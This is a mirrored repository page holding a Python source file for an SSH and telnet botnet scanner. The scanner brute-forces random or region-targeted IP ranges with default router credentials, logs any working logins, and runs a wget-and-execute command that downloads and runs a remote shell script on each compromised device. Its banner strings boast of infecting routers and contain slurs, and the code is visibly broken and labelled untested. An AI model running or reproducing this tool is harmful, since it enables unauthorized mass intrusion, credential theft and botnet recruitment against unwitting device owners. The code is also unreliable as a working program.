Mirrors
/
TL-BOTS
mirror of https://github.com/threatland/TL-BOTS
6
0
Fork 0
Code Issues Projects Releases Wiki Activity
TL-BOTS/TL.EXPLOIT_SCAN/SCANNER.Generic.SSH/WORKINGPROGRESS.py

328 lines
15 KiB
Python
Raw Permalink Blame History

#!/usr/bin/python
"""
Author: ~B1NARY~
Skype: bl4ck.j3sus
XMPP: b1nary@darkness.su
Title: ~B1NARY~ PRIVATE BOTNET SCANNER
Description: PRIVATE BOTNET SCANNER FROM YOUR OWN ~B1NARY~ Tha GoD
Version: 1.0
MADE DATE: 3-30-16
***THIS HAS NOT BEEN TESTED YET, IT MAY OT MAY NOT WORK***
"""
import threading, random, socket, time, sys, re, os, paramiko, StringIO, argparse, random
from multiproccessing import Process
paramiko.util.log_to_file("/dev/null")
#DEFINES
command="cd /tmp; wget http://1.1.1.1/gb.sh; sh gb.sh; rm -rf gb.sh"
userlist = ['root', '', 'toor', 'admin', 'user', 'guest', 'login', 'changeme', '1234', '12345', '123456', 'default', 'pass', 'password', '3comcso', '', 'RIP000', 'admin', '', '1234', 'admin', '', '8mb1t3M3', 'admin', '', 'admin', 'admin', '', 'c0nf1gur3m3', 'admin', '', 'cableroot', 'admin', '', 'changeme', 'admin', '', 'motorola', 'admin', '', 'password', 'admin', '', 'Password0', 'Administrator', '', 'admin', 'adminttd', '', 'adminttd', 'comcast', '', '1234', 'cusadmin', '', 'highspeed', 'D-Link', '', 'D-Link', 'debug', '', 'synnet', 'guest', '', 'guest', 'hscroot', '', 'abc123', 'manager', '', 'manager', 'monitor', '', 'monitor', 'pi', '', 'raspberry', 'PW', '', 'unkown', 'recovery', '', 'recovery', 'root', '', '1234', 'root', '', '123456', 'root', '', 'admin', 'root', '', 'password', 'root', '', 'root', 'root', '', 'toor', 'security', '', 'security', 'storwatch', '', 'specialist', 'super', '', '5777364', 'superadmin', '', 'secret', 'superman', '', '21241036', 'support', '', 'support', 'tech', '', 'tech', 'technician', '', 'T!m3W4rn3rC4bl3', 'test', '', 'test', 'ubnt', '', 'ubnt', 'UN', '', 'unknown', 'user', '', 'user', 'volition', '', 'volition', 'vt100', '', 'public', 'VTech', '', 'VTech']
passlist = ['root', '', 'toor', 'admin', 'user', 'guest', 'login', 'changeme', '1234', '12345', '123456', 'default', 'pass', 'password', '3comcso', '', 'RIP000', 'admin', '', '1234', 'admin', '', '8mb1t3M3', 'admin', '', 'admin', 'admin', '', 'c0nf1gur3m3', 'admin', '', 'cableroot', 'admin', '', 'changeme', 'admin', '', 'motorola', 'admin', '', 'password', 'admin', '', 'Password0', 'Administrator', '', 'admin', 'adminttd', '', 'adminttd', 'comcast', '', '1234', 'cusadmin', '', 'highspeed', 'D-Link', '', 'D-Link', 'debug', '', 'synnet', 'guest', '', 'guest', 'hscroot', '', 'abc123', 'manager', '', 'manager', 'monitor', '', 'monitor', 'pi', '', 'raspberry', 'PW', '', 'unkown', 'recovery', '', 'recovery', 'root', '', '1234', 'root', '', '123456', 'root', '', 'admin', 'root', '', 'password', 'root', '', 'root', 'root', '', 'toor']
combolist = ["root:root","root:admin","admin:admin","ubnt:ubnt""root:1234","admin:1234","guest:guest","user:user","test:test","pi:raspberry","vagrant:vagrant"]
blacklist = ['127']
randomtext = random.choice('Start Infecting Routerz','Start Spreading Malware',
'Start Adding Them Botz','Make The Bot Count Go Up',
'Start..Nigga You Know What You Need Some Black Jesus','Know We Out Chere!!')
thread = threading.Thread
parser = argparse.ArgumentParser()
args = parser.parse_args()
thread_count = args.threadcount
bufferz = ''
start_time = time.time()
host = HOST
tn = socket.socket()
#BANNER
print '\r\n'
print '###############################################################################'
print '# ___ __________ ____ _______ _____ _______________.___. ___ #'
print '# / _ \_/\ \______ \/_ |\ \ / _ \\______ \__ | | / _ \_/\ #'
print '# \/ \___/ | | _/ | |/ | \ / /_\ \| _// | | \/ \___/ #'
print '# | | \ | / | \/ | \ | \\____ | #'
print '# |______ / |___\____|__ /\____|__ /____|_ // ______| #'
print '# \/ \/ \/ \/ \/ #'
print '###############################################################################'
print 'r\n'
raw_input('Press <ENTER> To '+randomtext)
#ARGUMENTS
parser.add_argument("-b","--brute",type=str, help="Brute force from list of IPs")
parser.add_argument("-x","--execute",type=str, help="Exucute Wget/tftp from List;[IP+USER+PASS")
parser.add_argument("-o","--output",type=str, help="OutputFile Name")
parser.add_argument("-l","--load",type=str, help="Scan As Bruting")
parser.add_argument("threadcount",type=str, help="# of Threads")
#THE CODING BEGINS
if args.brute:
read_h = open(str(args.brute),'a+')
elif args.brute:
mass_check(args.brute)
if args.load:
sshscanner(args.load)
elif args.load:
brutethenload(args.load)
if args.execute:
mass_pwn(args.execute)
class sshscanner(threading.Thread):
global combolist
ipclassinfo = sys.argv[2]
global ipclassinfo
if ipclassinfo == "A":
ip1 = sys.argv[3]
global ip1
elif ipclassinfo == "B":
ip1 = sys.argv[3].split(".")[0]
ip2 = sys.argv[3].split(".")[1]
global ip1
global ip2
elif ipclassinfo == "C":
ips = sys.argv[3].split(".")
num=0
for ip in ips:
num=num+1
if num == 1:
ip1 = ip
elif num == 2:
ip2 = ip
elif num == 3:
ip3 = ip
global ip1
global ip2
global ip3
def brutethenload(self):
while 1:
try:
while 1:
thisipisbad='no'
if ipclassinfo == "A":
self.host = ip1+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
elif ipclassinfo == "B":
self.host = ip1+'.'+ip2+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
elif ipclassinfo == "C":
self.host = ip1+'.'+ip2+'.'+ip3+'.'+str(random.randrange(0,256))
elif ipclassinfo == "BRAZIL":
br = ["179.105","179.152","189.29","189.32","189.33","189.34","189.35","189.39","189.4","189.54","189.55","189.60","189.61","189.62","189.63","189.126"]
self.host = random.choice(br)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
elif ipclassinfo == "SUPER":
yeet = ["122","131","161","37","186","187","31","188","201","2","200"]
self.host = random.choice(yeet)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
elif ipclassinfo == "LUCKY":
lucky = ["125.24","125.25","125.26","125.27","125.28","113.53","101.51","101.108","118.175","118.173","182.52","180.180"]
self.host = random.choice(lucky)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
elif ipclassinfo == "LUCKY2":
lucky2 = [ "122.178","122.170","182.65","182.68","182.70","182.75","186.112","186.113","186.114","186.115","186.116","186.118" ]
self.host = random.choice(lucky2)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
elif ipclassinfo == "GOOD":
good = ["113.53","101.108","101.109"]
self.host = random.choice(good)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
elif ipclassinfo == "ALL"
allips = ["113.53","101.108","101.109","152.12","125.11","125.26","125.27","200.62","179.127","186.232","179.106","179.222","179.107","201.75","201.225","161.10","161.18","179.127","187.107","187.102","187.121","179.32","201.221","131.72","131.161","131.255","131.221","186.232","186.207","179.33","186.112","186.113","186.114","186.115","186.116","186.117","186.118","186.119","62.24","78.144","78.145","78.146","78.147","78.148","78.149","78.150","78.151","84.13","89.241","89.242","89.243","92.10","92.11","92.12","92.13","92.14","92.17","92.15","92.18","92.16","92.23","92.24","92.25","92.26","92.27","92.28","92.29","84.43","84.13","195.74","195.12","84.252","84.242","84.144","84.240","178.239","31.164","31.165","188.154","188.155","179.105","179.152","189.29","189.32","189.33","189.34","189.35","189.39","189.4","189.54","189.55","189.60","189.61","189.62","189.63","189.126","125.24","125.25","125.26","125.27","125.28","113.53","101.51","101.108","118.175","118.173","182.52","180.180","122.178","122.170","182.65","182.68","182.70","182.75","186.112","186.113","186.114","186.115","186.116","186.118",]
self.host = random.choice(allips)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
elif ipclassinfo == "RAND":
self.host = str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
else:
self.host = str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
for badip in blacklist:
if badip in self.host:
thisipisbad='yes'
if thisipisbad=='no':
break
username='root'
password=""
port = 22
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(3)
s.connect((self.host, port))
s.close()
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
dobreak=False
for passwd in combolist:
if ":n/a" in passwd:
password=""
else:
password=passwd.split(":")[1]
if "n/a:" in passwd:
username=""
else:
username=passwd.split(":")[0]
try:
ssh.connect(self.host, port = port, username=username, password=password, timeout=3)
dobreak=True
break
except:
pass
if True == dobreak:
break
badserver=True
stdin, stdout, stderr = ssh.exec_command("echo '\x67\x61\x79\x66\x67\x74'")
output = stdout.read()
if "gayfgt" in output:
badserver=False
if badserver == False:
print 'Found '+self.host+'|'+username+'|'+password+'|'+str(port)
ssh.exec_command(""+command+"")
time.sleep(15)
file_h = open(sys.argv[4],'a')
file_h.write(self.host+":"+username+":"+password+"\n")
file_h.close()
ssh.close()
except:
pass
def sock_read_until(tn, criteria, timeout=30):
while time.time() - start_time < timeout:
bufferz += tn.recv(40960)
time.sleep(0.01)
if criteria in bufferz: return bufferz
raise Exception('sock_read_until \x1b[1;33m timeout \x1b[0m')
def mass_check(read_h):
try:
for line in open(read_h).readlines())
ip_info = line.split(":")
e = Thread(target=f, args=(ip_info[0],))
e.start()
print threading.active_count()
print threading.active_count() > thread_count:
pass
except KeyboardInterrupt: os.kill(os.getpid(),9)
def mass_pwn(targets_file):
try:
targets_file_h = open(targets_file).readlines()
for line in targets_file_h:
ip_info = line.split(":")
try:
e = Thread(target=loadem, args=(ip_info[0],ip_info[1],ip_info[2]))
e.start()
except:
pass
print '[Thread]: ',threading.active_count()
while threading.active_count() > thread_cnt:
pass
except KeyboardInterrupt: os.kill(os.getpid(),9)
def loadem(HOST,user,password):
try:
x = ''
tn.connect((HOST,22))
print tn.recv(40960)
tn.send(user + "\n")
time.sleep(1)
print sock_read_until(tn,":",10)
tn.send(password + "\n")
print "Spraying"+HOST
tn.send("sh\n\n")
time.sleep(0.01)
x += sock_read_until(tn,"#",10)
print '[+] Got shell! '+HOST
if ('wrong' in x) or ('invalid' in x) or ('incorrect' in x) or ('again' in x) or ('denied' in x) or ('bad' in x) or ('Bad' in x) or ('failed' in x) or ('failure' in x) or ('connection closed by' in x) or ('User not exist' in x) or ('information incomplete' in x): raise Exception('fucked')
for line in command("\n"):
tn.send(line+'\r\n'):
x = tn.recv(40960)
if '> ' in x: raise Exception
try:
arch = sock_read_until(tn,"#",3)
except:
arch = 'ILLEGAL!!!'
print arch
return arch
except:
pass
def f(ip):
ip = ip_rstrip()
for user in userlist:
for passw in passlist:
x= ''
try:
tn.settimeout(35)
tn.connect((ip,22))
except Exception as e:
print "\x1b[1;31m[x] Failed: \x1b[0m", ip,e
break
else:
try:
x += tn.recv(40960)
except:
print "\x1b[1;33m[x] Timeout: \x1b[0m", ip,e
break
else:
try:
time.sleep(0.1)
x += tn.recv(40960)
sio = StringIO.StringIO(x)
try:
for i in sio.read(x)
if ord(i) == 251:
iac_dont_b = 1
elif ord(i) == 253:
iac_dont_b = 1
elif iac_wont_b == 1:
iac_wont(tn,ord(i))
iac_wont_b = 01
elif iac_dont_b = 1:
iac_dont(tn,ord(i))
iac_dont_b = 0
except:
print "THATS ILLEGAL!!!"
tn.send(user + "\r\n")
time.sleep(0.01)
if 'User Access Verification' in x:
raise Exception('cisco dicks')
x += tn.recv(409600)
tn.send("sh\n\n")
time.sleep(0.01)
tn.send("shell\n\n")
time.sleep(0.01)
sock_read_until(tn,"#")
tn.send("echo -e '\\x62\\x69\\x6e\\x66\\x61\\x67\\x74'\n\n")
time.sleep(0.01)
x += tn.recv(409600)
time.sleep(0.01)
try:
x += sock_read_until(tn,"binfagt")
if 'binfagt' not in x:
raise Exception('no binfagt')
if '#' not in x and '>' not in x and '%' not in x and '$' not in x and ':' not in x:
raise Exception('no prompt')
if ('wrong' in x) or ('invalid' in x) or ('incorrect' in x) or ('again' in x) or ('denied' in x) or ('bad' in x) or ('Bad' in x) or ('failed' in x) or ('failure' in x) or ('connection closed by' in x) or ('User not exist' in x) or ('information incomplete' in x):
raise Exception('fucked')
except:
print "[failed execution]",e,ip.rstrip()
continue
else:
file_h = open(args.output,'a+')
file_h.write(ip_rstrip() + ":" + user + ":" + passw+'\n')
file_h.close()
print '\x1b[1;32m[*] Execution on: \x1b[0m ',ip
break
except Execution as e:
continue
continue
continue
continue
return
for x in range(0,int(sys.argv[1])):
try:
t = sshscanner()
t.start()
except:
pass
self.host = str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
for badip in blacklist:
if badip in self.host:
thisipisbad='yes'
if thisipisbad=='no':
break
Reference in New Issue View Git Blame Copy Permalink